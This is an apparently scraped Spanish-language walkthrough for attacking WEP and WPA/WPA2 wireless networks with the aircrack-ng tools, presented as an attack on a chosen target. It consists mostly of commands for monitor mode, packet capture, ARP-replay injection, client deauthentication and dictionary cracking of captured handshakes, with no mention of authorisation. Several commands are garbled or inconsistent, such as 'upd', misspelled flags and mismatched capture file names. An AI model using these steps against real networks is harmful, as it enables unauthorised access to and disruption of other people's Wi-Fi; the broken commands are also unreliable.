Sie sind auf Seite 1von 15

ATAQUE DE RED SEGURIDAD WEP

 Identificar nombre interfaz inalámbrica

ifconfig

 Ver estado de la interfaz Modo-Maganer

iwconfig

 Habilitar interfaz

Ifconfig wlan0 up

Iwconfig

Ifconfig wlan0 down

Iwconfig wlan0 mode monitor

Ifconfig wlan0 up

 Revisar redes alcance y disponibles, seleccionar la red, guardar información en un archivo.


 Identificar el dispositivo a atacar y identificar su MAC y Canal en el cual esta trabajando

iwlist wlan0 scanning

 Iniciar interfaz en modo monitor

Airmon-ng start wlan0


 Realiza captura de tráfico y almacenar en un archivo

Airodump-ng –bssid MAC-AP -c 11 -w capturaPaquetes.txt wlan0


 Inyectar tráfico de paquetes y repetir envió paquetes se utiliza la opción 3 del comando
aireplay, opción b  identificar mac ap, opción h identificar mac cliente.

En una nueva terminal

Aireplay-ng- 3 -b MAC-AP -h MAC-CLIENTE –ingnore-negative-one wlan0


 Ejecutar ataque

En otra terminal

Aircrack-ng capturaTrafico.cap
ATAQUE DE RED SEGURIDAD WPA – WPA2

 Identificar nombre interfaz inalámbrica

ifconfig

 Ver estado de la interfaz Modo-Maganer

iwconfig

 Habilitar interfaz

Ifconfig wlan0 up

 Revisar redes alcance y disponibles

iwlist wlan0 scanning

 Seleccionar red a realizar el ataque y copiar en un archivo de texto


 Cambiar interfaz a modo monitor para realizar el ataque

Iwconfig

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 upd

iwconfig
 Activamos el modo monitor en la interfaz wlan0

airmon-ng start wlan0

 Capturar tráfico de paquetes puros de la trama IEEE 802.11 para su posterior tratamiento

MAC SACADO DEL ARCHIVO DE LA INFORMACIÓN DEL PUNTO DE ACCESO A ATACAR

C  CANAL DEL PUNTO DE ACCESO

-w  ARCHIVO DONDE SE VA CAPTURAR LA INFORMACION DE LOS PAQUETES


Airodump-ng –bssid MAC -c 11 -w capturaPaquetes.txt wlan0

Seleccionamos un cliente que este generan tráfico


 Captura de tráfico. Abrimos otro consola para hacer la desautenticacion

0 (--deauth)  Enviar más de un paquete de desautencación de clientes, que permite al punto de


acceso solicite autenticación a los clientes donde viajan paquetes con información de la clave de la
red.

-a  Establecer la MAC punto de acceso

-c Dirección MAC del cliente que se va a desautenticar

--ignore-negative-one  si no se identifica el canal donde se genera el tráfico, ignorara los


paquetes que no pertencen

Aireplay-ng- --deauth 1 -a MAC-AP -c MAC-CLIENTE –ingnore-negative-one wlan0


 Obtener clave red inalámbrica

Aircrak-ng

-w  Establecer la ruta a un diccionario de craqueo red, dado que es un ataque de fuerza bruta es
necesario tener un archivo donde se encuentre claves precompartidas.

Se generó un archivo con extensión .cap con el nombre de del archivo generado.
Aircrack-ng -w diccionario.txt capturaPaquetes.cap

Das könnte Ihnen auch gefallen